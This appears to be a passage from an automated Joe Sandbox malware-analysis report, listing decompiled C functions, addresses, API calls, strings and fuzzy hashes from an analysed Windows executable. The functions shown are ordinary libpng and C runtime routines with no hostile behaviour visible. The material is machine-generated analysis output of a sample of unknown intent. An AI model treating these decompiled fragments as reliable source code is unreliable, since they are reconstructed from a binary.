				}
			}

0x00403319
0x0040331e
0x00403323
0x0040332a
0x0040332c
0x0040332e
0x00403330
0x00403339
0x0040333c
0x00403340
0x00403349
0x00403380
0x00403380
0x0040334b
0x00403354
0x0040335d
0x00403361
0x00403369
0x0040336d
0x00403372
0x00403376
0x0040337a
0x0040337a
0x00403382
0x0040338d
0x00403393
0x00403396
0x00403396
0x0040339b
0x004033b0
0x004033c4
0x004033cf
0x004033d3
0x004033db
0x004033e0
0x004033e3
0x004033e6
0x004033e6
0x004033e8
0x004033e9
0x004033ef
0x004033f7
0x004033fc
0x0040340f
0x004037cf
0x004037d6
0x004037e7
0x004037ef
0x00403415
0x00403415
0x00403416
0x00403416
0x00403431
0x0040343a
0x0040343c
0x00403441
0x00403444
0x00403446
0x00000000
0x00000000
0x0040344c
0x00403453
0x00403453
0x00403454
0x00403459
0x0040345d
0x0040346d
0x0040347e
0x00403489
0x00403490
0x004034d4
0x004034db
0x004034de
0x004034e2
0x004034ea
0x004034ec
0x00403527
0x00403527
0x004034ee
0x004034fa
0x00403503
0x00403509
0x00403511
0x00403515
0x0040351c
0x0040351f
0x00403522
0x00403522
0x00403529
0x00403534
0x00403537
0x0040353d
0x0040353d
0x00403540
0x00403540
0x00403551
0x00403561
0x00403562
0x00403573
0x00403575
0x0040357d
0x00403582
0x00403586
0x00403588
0x0040358f
0x0040358a
0x0040358a
0x0040358a
0x00403592
0x00403595
0x00403492
0x0040349e
0x004034ae
0x004034af
0x004034bc
0x004034c2
0x004034ca
0x004034ca
0x004035a1
0x004035b2
0x004035bd
0x004035c4
0x004036ea
0x004036f1
0x004036f4
0x004036f8
0x00403700
0x00403702
0x00403739
0x00403739
0x00403704
0x0040370c
0x00403715
0x0040371b
0x00403723
0x00403727
0x0040372e
0x00403731
0x00403734
0x00403734
0x0040373b
0x00403746
0x00403749
0x0040374f
0x0040374f
0x00403752
0x00403752
0x0040375f
0x0040376f
0x00403770
0x0040377d
0x0040377f
0x00403787
0x00000000
0x004035ca
0x004035d2
0x004035e2
0x004035e3
0x004035f0
0x004035f6
0x004035fe
0x00403607
0x0040363b
0x00403642
0x00403645
0x00403649
0x00403651
0x00403653
0x004036b1
0x004036b1
0x00403655
0x00403660
0x00403672
0x00403676
0x0040367e
0x00403682
0x00403687
0x0040368a
0x00403690
0x0040369b
0x0040369f
0x004036a6
0x004036a9
0x004036ac
0x004036ac
0x004036b3
0x004036b6
0x004036bf
0x004036bf
0x004036c2
0x004036c2
0x004036c7
0x004036d2
0x004036d5
0x00403790
0x00403790
0x00403795
0x0040379f
0x0040379f
0x004037a2
0x004037a4
0x00000000
0x00000000
0x004037a6
0x004037a8
0x004037aa
0x00000000
0x00000000
0x00000000
0x004037aa
0x004037ac
0x004037af
0x004037b2
0x004037b2
0x00000000
0x004037b2
0x00403797
0x0040379a
0x00000000
0x004036db
0x004036db
0x004036de
0x0040378b
0x0040378b
0x00000000
0x0040378b
0x004036d5
0x00403609
0x0040360c
0x00403612
0x00403619
0x00403614
0x00403614
0x00403614
0x0040361c
0x00403621
0x00403632
0x00403623
0x00403623
0x00403626
0x00403626
0x00000000
0x00403621
0x004037b6
0x004037c0
0x00000000
0x004037ce

APIs

__EH_prolog.LIBCMT ref: 0040331E

Part of subcall function 0043057C: _malloc.LIBCMT ref: 00430594

_memset.LIBCMT ref: 004033DB

Part of subcall function 0043057C: std::exception::exception.LIBCMT ref: 004305B0
Part of subcall function 0043057C: __CxxThrowException@8.LIBCMT ref: 004305C5

Strings

root, xrefs: 0040334B

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Exception@8H_prologThrow_malloc_memsetstd::exception::exception
String ID: root
API String ID: 55267430-385153371
Opcode ID: 4564a92fed8b12647f1e72c5d93c6bd57f0816684ce10972962cbb695ea45c1f
Instruction ID: dc0e7af1e5a8205d2c1f8461b3ead866a39eea0fc31fb4e6335e2dd9d81a6901
Opcode Fuzzy Hash: 4564a92fed8b12647f1e72c5d93c6bd57f0816684ce10972962cbb695ea45c1f
Instruction Fuzzy Hash: 67D1B7715087819FD320DF25C841B9BBBE4BF94349F040A2EE4C9A72D1DB789609CF9A

Uniqueness

Uniqueness Score: -1,00%

Function 004186B0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 214
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004186B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t124;
				intOrPtr _t130;
				void* _t132;
				intOrPtr _t137;
				intOrPtr _t147;
				void* _t210;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t216;
				void* _t219;

				_v8 = 0xffffffff;
				if( *((intOrPtr*)(_a4 + 0x284)) > 0 &&  *((intOrPtr*)(_a4 + 0x284)) < _v8) {
					_v8 =  *((intOrPtr*)(_a4 + 0x284));
				}
				if(_v8 < (0 | _a20 != 0x00000000) + _a12) {
					E0040F3E0(_a4, _a4, 0xfffffffc);
					return 0xfffffffc;
				}
				_v8 = _v8 - (0 | _a20 != 0x00000000) + _a12;
				if(_v8 <  *_a16) {
					 *_a16 = _v8;
				}
				_t124 = E00416750(_a4,  *((intOrPtr*)(_a4 + 0x11c)));
				_t212 = _t210 + 8;
				_v12 = _t124;
				if(_v12 != 0) {
					if(_v12 == 1) {
						_v12 = 0xfffffff9;
					}
				} else {
					_v16 = _a8 - _a12;
					_t130 = E00418960(_a4,  *((intOrPtr*)(_a4 + 0x11c)), 1,  *((intOrPtr*)(_a4 + 0x2a0)) + _a12,  &_v16, 0, _a16);
					_t213 = _t212 + 0x1c;
					_v12 = _t130;
					if(_v12 != 1) {
						if(_v12 == 0) {
							_v12 = 0xfffffff9;
						}
					} else {
						_t132 = E0042B2FD(_a4 + 0x84);
						_t214 = _t213 + 4;
						if(_t132 != 0) {
							E0040F3E0(_v12, _a4, _v12);
							_v12 = 0xfffffff9;
						} else {
							_v24 =  *_a16;
							_v28 = _a12 + _v24 + (0 | _a20 != 0x00000000);
							_t168 = _v28;
							_t137 = E00424430(_a4, _v28);
							_t216 = _t214 + 8;
							_v20 = _t137;
							if(_v20 == 0) {
								_v12 = 0xfffffffc;
								E0040F3E0(_t168, _a4, 0xfffffffc);
							} else {
								E004345E0(_v20, 0, _v28);
								_t147 = E00418960(_a4,  *((intOrPtr*)(_a4 + 0x11c)), 1,  *((intOrPtr*)(_a4 + 0x2a0)) + _a12,  &_v16, _v20 + _a12, _a16);
								_t219 = _t216 + 0x28;
								_v12 = _t147;
								if(_v12 != 1) {
									if(_v12 == 0) {
										_v12 = 0xfffffff9;
									}
								} else {
									if(_v24 !=  *_a16) {
										_v12 = 0xfffffff9;
									} else {
										if(_a20 != 0) {
											 *((char*)(_v20 + _a12 +  *_a16)) = 0;
										}
										if(_a12 > 0) {
											L00433F90(_v20,  *((intOrPtr*)(_a4 + 0x2a0)), _a12);
											_t219 = _t219 + 0xc;
										}
										_v32 =  *((intOrPtr*)(_a4 + 0x2a0));
										 *((intOrPtr*)(_a4 + 0x2a0)) = _v20;
										 *((intOrPtr*)(_a4 + 0x2a4)) = _v28;
										_v20 = _v32;
									}
								}
								E00424630(_a4, _a4, _v20);
								if(_v12 == 1 && _a8 - _a12 != _v16) {
									E0041B9A0(_a4, "extra compressed data");
								}
							}
						}
					}
					 *((intOrPtr*)(_a4 + 0x80)) = 0;
				}
				return _v12;
			}

0x004186b6
0x004186c7
0x004186e0
0x004186e0
0x004186f2
0x00418943
0x00000000
0x0041894b
0x00418709
0x00418714
0x0041871c
0x0041871c
0x0041872c
0x00418731
0x00418734
0x0041873b
0x0041892d
0x0041892f
0x0041892f
0x00418741
0x00418747
0x00418771
0x00418776
0x00418779
0x00418780
0x00418911
0x00418913
0x00418913
0x00418786
0x00418790
0x00418795
0x0041879a
0x004188fc
0x00418904
0x004187a0
0x004187a5
0x004187b9
0x004187bc
0x004187c4
0x004187c9
0x004187cc
0x004187d3
0x004188dd
0x004188ea
0x004187d9
0x004187e3
0x00418817
0x0041881c
0x0041881f
0x00418826
0x004188a0
0x004188a2
0x004188a2
0x00418828
0x00418830
0x00418893
0x00418832
0x00418836
0x00418843
0x00418843
0x0041884b
0x0041885f
0x00418864
0x00418864
0x00418870
0x00418879
0x00418885
0x0041888e
0x0041888e
0x0041889a
0x004188b1
0x004188bd
0x004188d3
0x004188d8
0x004188db
0x004188f2
0x0041890b
0x0041891d
0x0041891d
0x00000000

APIs

_memset.LIBCMT ref: 004187E3
_memmove.LIBCMT ref: 0041885F

Strings

extra compressed data, xrefs: 004188CA

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memmove_memset
String ID: extra compressed data
API String ID: 3555123492-3657587875
Opcode ID: 4a1c621434b49c3b3f64524b1021baece7ee374f0fc07a22e824d894623d048c
Instruction ID: a8cdaf78aabe8535b721cb1c22d5bf3eb8d511a31cc1bfd874bd81e7e98043c1
Opcode Fuzzy Hash: 4a1c621434b49c3b3f64524b1021baece7ee374f0fc07a22e824d894623d048c
Instruction Fuzzy Hash: CA9171B5E00209EFCB04DF94D884AEE7BB5BF48314F24826DF9155B381D734AA81CB95

Uniqueness

Uniqueness Score: -1,00%

Function 00425CE0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00425E51

Strings

unknown chunk: out of memory, xrefs: 00425E26
too many unknown chunks, xrefs: 00425D32

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: too many unknown chunks$unknown chunk: out of memory
API String ID: 4104443479-3772071776
Opcode ID: ecd5b487c5a8f1e18d199f9d59ad0a6cef49b1732551ca26524c3518b771856f
Instruction ID: e492fd6f3831ad4dd5abc411e40be7aa1458fdd68d5e217c38a7ccc2723c82a0
Opcode Fuzzy Hash: ecd5b487c5a8f1e18d199f9d59ad0a6cef49b1732551ca26524c3518b771856f
Instruction Fuzzy Hash: CA5105B5A00209EFCB04CF44D985BAAB7B1FF48304F64C5AAEC195B342D635EE41DB94

Uniqueness

Uniqueness Score: -1,00%

Function 004251A0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004251A0(void* __eax, intOrPtr _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t52;
				signed int _t54;
				signed int _t64;

				_t52 = __eax;
				if(_a4 == 0 || _a8 == 0) {
					return _t52;
				} else {
					_t53 = _a8;
					if(( *(_a8 + 0x19) & 0x000000ff) != 3) {
						_v12 = 0x100;
					} else {
						_t53 = 1 << ( *(_a8 + 0x18) & 0x000000ff);
						_v12 = 1;
					}
					_v8 = _v12;
					if(_a16 < 0 || _a16 > _v8) {
						_t54 = _a8;
						_t71 =  *(_t54 + 0x19) & 0x000000ff;
						if(( *(_t54 + 0x19) & 0x000000ff) != 3) {
							return E0041B3B0(_t71, _a4, "Invalid palette length");
						}
						_t53 = E0041B170(_a4, "Invalid palette length");
						goto L11;
					} else {
						L11:
						if(_a16 <= 0 || _a12 != 0) {
							if(_a16 != 0 || ( *(_a4 + 0x250) & 0x00000001) != 0) {
								goto L16;
							} else {
								goto L15;
							}
						} else {
							L15:
							_t53 = E0041B170(_a4, "Invalid palette");
							L16:
							L0040EC10(_t53, _a4, _a8, 0x1000, 0);
							 *((intOrPtr*)(_a4 + 0x13c)) = E004243F0(_a8, _a4, 0x300);
							if(_a16 > 0) {
								L00433F90( *((intOrPtr*)(_a4 + 0x13c)), _a12, _a16 * 3);
							}
							 *((intOrPtr*)(_a8 + 0x10)) =  *((intOrPtr*)(_a4 + 0x13c));
							 *((short*)(_a4 + 0x140)) = _a16;
							 *((short*)(_a8 + 0x14)) = _a16;
							 *(_a8 + 0xf4) =  *(_a8 + 0xf4) | 0x00001000;
							_t64 = _a8;
							 *(_t64 + 8) =  *(_a8 + 8) | 0x00000008;
							return _t64;
						}
					}
				}
			}

0x004251a0
0x004251aa
0x00000000
0x004251b7
0x004251b7
0x004251c1
0x004251d6
0x004251c3
0x004251cf
0x004251d1
0x004251d1
0x004251e0
0x004251e7
0x004251f1
0x004251f4
0x004251fb
0x00000000
0x0042521b
0x00425206
0x00000000
0x00425223
0x00425223
0x00425227
0x00425233
0x00000000
0x00000000
0x00000000
0x00000000
0x00425243
0x00425243
0x0042524c
0x00425251
0x00425260
0x0042527c
0x00425286
0x0042529d
0x004252a2
0x004252b1
0x004252bb
0x004252c9
0x004252df
0x004252ee
0x004252f1
0x00000000
0x004252f1
0x00425227
0x004251e7

APIs

_memmove.LIBCMT ref: 0042529D

Strings

Invalid palette length, xrefs: 004251FD, 0042520D
Invalid palette, xrefs: 00425243

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: Invalid palette$Invalid palette length
API String ID: 4104443479-1329844174
Opcode ID: 0c095d1aecba261cd535ba1842f7d68bf73f18d828d04e0f545442043dac636d
Instruction ID: 86db81f27ad47ee935eaaf03834fa6fda25d9b359a246f50ad88a6095d679e85
Opcode Fuzzy Hash: 0c095d1aecba261cd535ba1842f7d68bf73f18d828d04e0f545442043dac636d
Instruction Fuzzy Hash: 05415C78A00208EBCB04CF14E585BAA77B1EF88304F50C09AFC199F381D379DA91CBA5

Uniqueness

Uniqueness Score: -1,00%

Function 00414CC0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 00413A30: __aligned_recalloc.LIBCMTD ref: 00413A49

_memset.LIBCMT ref: 00414D12

Part of subcall function 0041BD00: __setjmp3.LIBCMT ref: 0041BD1D

Strings

png_image_write_to_stdio: invalid argument, xrefs: 00414D69
png_image_write_to_stdio: incorrect PNG_IMAGE_VERSION, xrefs: 00414D84

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: __aligned_recalloc__setjmp3_memset
String ID: png_image_write_to_stdio: incorrect PNG_IMAGE_VERSION$png_image_write_to_stdio: invalid argument
API String ID: 4049482486-1097569387
Opcode ID: 5877238388c449d5ad73e8656babf4897bcd533b7b24ba20509ee01c0662b7e1
Instruction ID: 0acb6775f32e63605217c76b63c7906b4d8e47e7fc9ec835b8df6d92ef3fe42a
Opcode Fuzzy Hash: 5877238388c449d5ad73e8656babf4897bcd533b7b24ba20509ee01c0662b7e1
Instruction Fuzzy Hash: E62130B9A00208ABCF14DF94E841BEE77B4AB88344F10812AFC099B341D738D9D5CB99

Uniqueness

Uniqueness Score: -1,00%

Function 00413A30, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

__aligned_recalloc.LIBCMTD ref: 00413A49

Strings

1.6.35, xrefs: 00413A44
png_image_write_: out of memory, xrefs: 00413AED

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: __aligned_recalloc
String ID: 1.6.35$png_image_write_: out of memory
API String ID: 3323695213-2266371953
Opcode ID: 64d17c6c75edff92461650a07f1450a2a97a9ce5bf83762b8a6aeba1bc938d17
Instruction ID: d72a742f54de3b22c0fb6675c942fb75689cc0fb6fd22fcf4138c0dc31fed385
Opcode Fuzzy Hash: 64d17c6c75edff92461650a07f1450a2a97a9ce5bf83762b8a6aeba1bc938d17
Instruction Fuzzy Hash: FC212174D00208EFCB04DFA5D541ADDBBB4EF48305F2484AEE809AB341E675AB85CB95

Uniqueness

Uniqueness Score: -1,00%

Function 00424500, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00424500(void* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int _a20) {
				intOrPtr _v8;
				intOrPtr _t31;
				void* _t49;
				void* _t50;

				_push(__ecx);
				if(_a16 <= 0 || _a20 == 0 || _a12 < 0 || _a8 == 0 && _a12 > 0) {
					E0041B170(_a4, "internal error: array realloc");
				}
				if(_a16 > 0x7fffffff - _a12) {
					L11:
					return 0;
				} else {
					_t31 = E004244C0(_a4, _a4, _a12 + _a16, _a20);
					_t50 = _t49 + 0xc;
					_v8 = _t31;
					if(_v8 == 0) {
						goto L11;
					}
					if(_a12 > 0) {
						L00433F90(_v8, _a8, _a20 * _a12);
						_t50 = _t50 + 0xc;
					}
					E004345E0(_a20 * _a12 + _v8, 0, _a20 * _a16);
					return _v8;
				}
			}

0x00424503
0x00424508
0x0042452b
0x0042452b
0x0042453b
0x0042459d
0x00000000
0x0042453d
0x0042454c
0x00424551
0x00424554
0x0042455b
0x00000000
0x00000000
0x00424561
0x00424573
0x00424578
0x00424578
0x00424590
0x00000000
0x00424598

APIs

_memmove.LIBCMT ref: 00424573
_memset.LIBCMT ref: 00424590

Strings

internal error: array realloc, xrefs: 00424522

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memmove_memset
String ID: internal error: array realloc
API String ID: 3555123492-2940788318
Opcode ID: a295b28d6672e02e2c31d3561d3f4a3718b0f83eaf46db68b4e9315d1dea2621
Instruction ID: 8fb9ad1dd4bda48b1d1d9a915de7934dda92b6beee0096ba376a04118ebe9e66
Opcode Fuzzy Hash: a295b28d6672e02e2c31d3561d3f4a3718b0f83eaf46db68b4e9315d1dea2621
Instruction Fuzzy Hash: 97214F76A00219EBCF14CF54E946BDB77A4EB94309F44451AFA1486281D378EA90CBD9

Uniqueness

Uniqueness Score: -1,00%

Function 0041BC00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

_longjmp.LIBCMT ref: 0041BC5F

Part of subcall function 00438490: RtlUnwind.KERNEL32(?,004384DE,80000026,00000000,?,?), ref: 004384D9

_abort.LIBCMT ref: 0041BC98

Strings

bad longjmp: , xrefs: 0041BC64

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Unwind_abort_longjmp
String ID: bad longjmp:
API String ID: 1663018815-1348530612
Opcode ID: 7a121d3cda7d4534664622839c00375505748013464e1508d8ac107f529c4e13
Instruction ID: b67eb07ac51cefd35538595d77cecde258e03af03cbf822efb2b6310738f9caa
Opcode Fuzzy Hash: 7a121d3cda7d4534664622839c00375505748013464e1508d8ac107f529c4e13
Instruction Fuzzy Hash: E811EF74A00208BFE714DF95C895F9EB7B5EB48708F148599E6046B382D775AEC1CB88

Uniqueness

Uniqueness Score: -1,00%

Function 0043127C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043127C() {
				intOrPtr _t3;
				intOrPtr _t4;
				void* _t6;
				intOrPtr _t9;
				void* _t12;
				intOrPtr _t13;

				_t3 =  *0x46c9f0; // 0x200
				_t13 = 0x14;
				if(_t3 != 0) {
					if(_t3 < _t13) {
						_t3 = _t13;
						goto L4;
					}
				} else {
					_t3 = 0x200;
					L4:
					 *0x46c9f0 = _t3;
				}
				_t4 = E004374B4(_t3, 4);
				 *0x46c9ec = _t4;
				if(_t4 != 0) {
					L8:
					_t12 = 0;
					_t9 = 0x469668;
					while(1) {
						 *((intOrPtr*)(_t12 + _t4)) = _t9;
						_t9 = _t9 + 0x20;
						_t12 = _t12 + 4;
						if(_t9 >= 0x4698e8) {
							break;
						}
						_t4 =  *0x46c9ec; // 0x326958
					}
					return 0;
				} else {
					 *0x46c9f0 = _t13;
					_t4 = E004374B4(_t13, 4);
					 *0x46c9ec = _t4;
					if(_t4 != 0) {
						goto L8;
					} else {
						_t6 = 0x1a;
						return _t6;
					}
				}
			}

0x0043127c
0x00431284
0x00431287
0x00431292
0x00431294
0x00000000
0x00431294
0x00431289
0x00431289
0x00431296
0x00431296
0x00431296
0x0043129e
0x004312a5
0x004312ac
0x004312cc
0x004312cc
0x004312ce
0x004312d3
0x004312d3
0x004312d6
0x004312d9
0x004312e2
0x00000000
0x00000000
0x004312e4
0x004312e4
0x004312ee
0x004312ae
0x004312b1
0x004312b7
0x004312be
0x004312c5
0x00000000
0x004312c7
0x004312c9
0x004312cb
0x004312cb
0x004312c5

APIs

__calloc_crt.LIBCMT ref: 0043129E
__calloc_crt.LIBCMT ref: 004312B7

Strings

Xi2, xrefs: 004312A5, 004312BE, 004312E4

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: __calloc_crt
String ID: Xi2
API String ID: 3494438863-3775276916
Opcode ID: c3b4b07bb5631c21eeb6a9e77aef420947bf694d7d5b1ef0af247e7e404424d5
Instruction ID: f8c1f4190f92cb61ef044d89baa4b946a299b5b9caa7346fd64ef5d5433db3d3
Opcode Fuzzy Hash: c3b4b07bb5631c21eeb6a9e77aef420947bf694d7d5b1ef0af247e7e404424d5
Instruction Fuzzy Hash: 7FF0CDF120560286F7149B5DBC81AB72BDCA71C724F14516BF140EA2A1F7BCCC41879E

Uniqueness

Uniqueness Score: -1,00%

Function 00402267, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00402267(void* __ebx, void* __edx, void* __edi) {
				char* _v8;
				char _v20;
				char _v36;
				char _v40;
				intOrPtr* _v52;
				char _v56;
				void* __esi;
				void* __ebp;
				intOrPtr* _t31;
				intOrPtr _t46;
				signed int _t47;
				signed int _t48;
				signed int _t50;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t65;
				void* _t67;
				intOrPtr* _t68;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t81;

				_t66 = __edi;
				_t65 = __edx;
				_t55 = __ebx;
				_push(0x2c);
				_t31 = E0043057C(__ebx, __edi, _t81);
				if(_t31 == 0) {
					_t71 = _t76;
					_t77 = _t76 - 0x10;
					_push(1);
					_t4 =  &_v8; // 0x405158
					_v8 = "bad allocation";
					E00432030( &_v20, _t4);
					_v20 = 0x44d938;
					E004323B9( &_v20, 0x4674b0);
					asm("int3");
					_push(_t71);
					_t72 = _t77;
					_t78 = _t77 - 0xc;
					E0043200B( &_v40,  &_v20);
					_v40 = 0x44d960;
					E004323B9( &_v40, 0x467504);
					asm("int3");
					_push(_t72);
					_t73 = _t78;
					E0043200B( &_v56,  &_v36);
					_v56 = 0x44d96c;
					E004323B9( &_v56, 0x467540);
					asm("int3");
					_push(_t73);
					_t46 = L00436E83(__edi, _t67, __eflags);
					_t68 = _v52;
					 *_t68 = _t46;
					_t47 = E004374B4(0x100, 2);
					_t61 = _t67;
					 *(_t68 + 4) = _t47;
					__eflags = _t47;
					if(__eflags == 0) {
						_t48 = L00436E07(__edi, _t68, __eflags);
						_t25 = _t68 + 8;
						 *_t25 =  *(_t68 + 8) & 0x00000000;
						__eflags =  *_t25;
						 *(_t68 + 4) = _t48;
					} else {
						L00433F90( *(_t68 + 4), L00436E07(__edi, _t68, __eflags), 0x200);
						 *(_t68 + 8) = 1;
					}
					_t50 =  *(L00436EA9(_t66, _t68, __eflags) + 4);
					 *(_t68 + 0xc) = _t50;
					__eflags = _t50;
					if(_t50 != 0) {
						 *(_t68 + 0xc) = L00436E30(_t55, _t61, _t65, _t66, _t68, _t50);
					}
					return _t68;
				} else {
					_t1 = _t31 + 4; // 0x4
					_t63 = _t1;
					 *_t31 = _t31;
					if(_t63 != 0) {
						 *_t63 = _t31;
					}
					_t64 = _t31 + 8;
					if(_t64 != 0) {
						 *_t64 = _t31;
					}
					 *((short*)(_t31 + 0xc)) = 0x101;
					return _t31;
				}
			}

0x00402267
0x00402267
0x00402267
0x00402267
0x00402269
0x00402271
0x00408dde
0x00408de0
0x00408de3
0x00408de5
0x00408dec
0x00408df3
0x00408e01
0x00408e08
0x00408e0d
0x00408e0e
0x00408e0f
0x00408e11
0x00408e21
0x00408e2f
0x00408e36
0x00408e3b
0x00408e3c
0x00408e3d
0x00408e4f
0x00408e5d
0x00408e64
0x00408e69
0x00408e6a
0x00408e6e
0x00408e73
0x00408e7d
0x00408e7f
0x00408e85
0x00408e86
0x00408e89
0x00408e8b
0x00408eac
0x00408eb1
0x00408eb1
0x00408eb1
0x00408eb5
0x00408e8d
0x00408e9b
0x00408ea3
0x00408ea3
0x00408ebd
0x00408ec0
0x00408ec3
0x00408ec5
0x00408ece
0x00408ece
0x00408ed5
0x00402277
0x00402277
0x00402277
0x0040227a
0x0040227e
0x00402280
0x00402280
0x00402282
0x00402287
0x00402289
0x00402289
0x0040228b
0x00402291
0x00402291

APIs

Part of subcall function 0043057C: _malloc.LIBCMT ref: 00430594

std::exception::exception.LIBCMT ref: 00408DF3
__CxxThrowException@8.LIBCMT ref: 00408E08

Strings

XQ@, xrefs: 00408DE5, 00408DE8

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: XQ@
API String ID: 4063778783-1217563551
Opcode ID: 34b0c5c7eb7b5aaab13d4106abb78a2d29cf40fccc89cec16b4e597366509c95
Instruction ID: 15ccc9bd27550fc3bf50c2c83fd430918d25c0ec1731a4e48d5b89902b9ecd26
Opcode Fuzzy Hash: 34b0c5c7eb7b5aaab13d4106abb78a2d29cf40fccc89cec16b4e597366509c95
